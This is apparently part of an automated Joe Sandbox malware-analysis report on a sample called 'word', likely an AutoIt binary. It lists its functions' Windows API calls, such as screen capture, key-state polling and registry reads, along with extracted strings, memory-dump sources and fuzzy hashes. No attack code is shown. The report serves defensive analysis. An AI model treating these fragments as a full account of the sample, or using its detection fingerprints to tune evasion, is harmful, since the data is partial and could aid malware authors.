                                                                            • DeleteObject.GDI32(09F8A736), ref: 0046EB7F
                                                                            • DestroyWindow.USER32 ref: 0046EB97
                                                                            • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                            • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                            • String ID: X+
                                                                            • API String ID: 802431696-1938338529
                                                                            • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                            • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                                            • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                            • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                                                            Function 00434506 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 00434585
                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                            • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                            • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                            • String ID: (
                                                                            • API String ID: 3300687185-3887548279
                                                                            • Opcode ID: 209e2f7067df3e6dce0ce98e9e91acdecf4b3f60bb8595cd902f19eedb978ee7
                                                                            • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                            • Opcode Fuzzy Hash: 209e2f7067df3e6dce0ce98e9e91acdecf4b3f60bb8595cd902f19eedb978ee7
                                                                            • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                                            Function 0045E41B Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 150COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                            • __swprintf.LIBCMT ref: 0045E4D9
                                                                            • _printf.LIBCMT ref: 0045E595
                                                                            • _printf.LIBCMT ref: 0045E5B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString_printf$__swprintf_wcslen
                                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                            • API String ID: 3590180749-2894483878
                                                                            • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                            • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                            • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                            • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                            Function 0046F90E Relevance: 21.1, APIs: 14, Instructions: 147windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                            • LoadImageW.USER32 ref: 0046F929
                                                                            • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                            • DeleteObject.GDI32(?), ref: 0046F950
                                                                            • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                            • LoadImageW.USER32 ref: 0046F9A8
                                                                            • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                            • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                            • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                            • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                            • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                            • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                            • DeleteObject.GDI32(?), ref: 0046FA68
                                                                            • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                            • String ID:
                                                                            • API String ID: 3412594756-0
                                                                            • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                            • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                            • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                            • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                            Function 0045D971 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 140COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?), ref: 0045336E
                                                                              • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                            • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                            • API String ID: 4013263488-4113822522
                                                                            • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                            • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                            • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                            • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                            Function 00435A35 Relevance: 21.1, APIs: 14, Instructions: 136timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                                            • String ID:
                                                                            • API String ID: 228034949-0
                                                                            • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                            • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                                                            • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                            • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                                                            Function 004334CA Relevance: 21.1, APIs: 14, Instructions: 132filecommemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004334F4
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00433533
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00433541
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0043354F
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                            • CopyImage.USER32 ref: 004335DB
                                                                            • DeleteObject.GDI32(?), ref: 00433603
                                                                            • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                            • String ID:
                                                                            • API String ID: 3969911579-0
                                                                            • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                            • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                            • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                            • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                            Function 00445A77 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 73windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32 ref: 00445A8D
                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                            • __wcsicoll.LIBCMT ref: 00445AC4
                                                                            • __wcsicoll.LIBCMT ref: 00445AE0
                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                            • API String ID: 3125838495-3381328864
                                                                            • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                            • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                            • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                            • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                            Function 00479921 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 314COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CopyVariant$ErrorLast
                                                                            • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                            • API String ID: 2286883814-4206948668
                                                                            • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                            • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                            • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                            • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                            Function 00475D8B Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 194COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?), ref: 0045336E
                                                                              • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                            • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                            • _wcscpy.LIBCMT ref: 00475F18
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                            • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                            • API String ID: 3052893215-4176887700
                                                                            • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                            • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                            • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                            • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                            Function 00448DAF Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 173windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                                            • SendMessageW.USER32(750A0E13,00001001,00000000,00000000), ref: 00448E73
                                                                            • SendMessageW.USER32(750A0E13,00001026,00000000,00000000), ref: 00448E7E
                                                                              • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                            • String ID: X+
                                                                            • API String ID: 3771399671-1938338529
                                                                            • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                            • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                                                            • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                            • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                                                            Function 004582BF Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 165registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • StringFromIID.OLE32(?,?), ref: 004582E5
                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            • CoTaskMemFree.OLE32(?), ref: 00458335
                                                                            • RegOpenKeyExW.ADVAPI32 ref: 00458351
                                                                            • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                            • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                            • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                            • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                              • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                            • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                            • String ID: Version$\TypeLib$interface\
                                                                            • API String ID: 656856066-939221531
                                                                            • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                            • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                            • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                            • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                            Function 0046F50B Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 157windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                              • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                              • Part of subcall function 00456354: GetAsyncKeyState.USER32 ref: 004563D0
                                                                              • Part of subcall function 00456354: GetAsyncKeyState.USER32 ref: 004563DC
                                                                            • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                            • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                            • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                            • ReleaseCapture.USER32 ref: 0046F589
                                                                            • SetWindowTextW.USER32(?,00000000,?,?,00000000,00000000,?,00000000), ref: 0046F620
                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID$X+$HH
                                                                            • API String ID: 2483343779-2266684231
                                                                            • Opcode ID: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
                                                                            • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                            • Opcode Fuzzy Hash: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
                                                                            • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                            Function 0045E62E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 155COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                            • __swprintf.LIBCMT ref: 0045E6EE
                                                                            • _printf.LIBCMT ref: 0045E7A9
                                                                            • _printf.LIBCMT ref: 0045E7D2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString_printf$__swprintf_wcslen
                                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 3590180749-2354261254
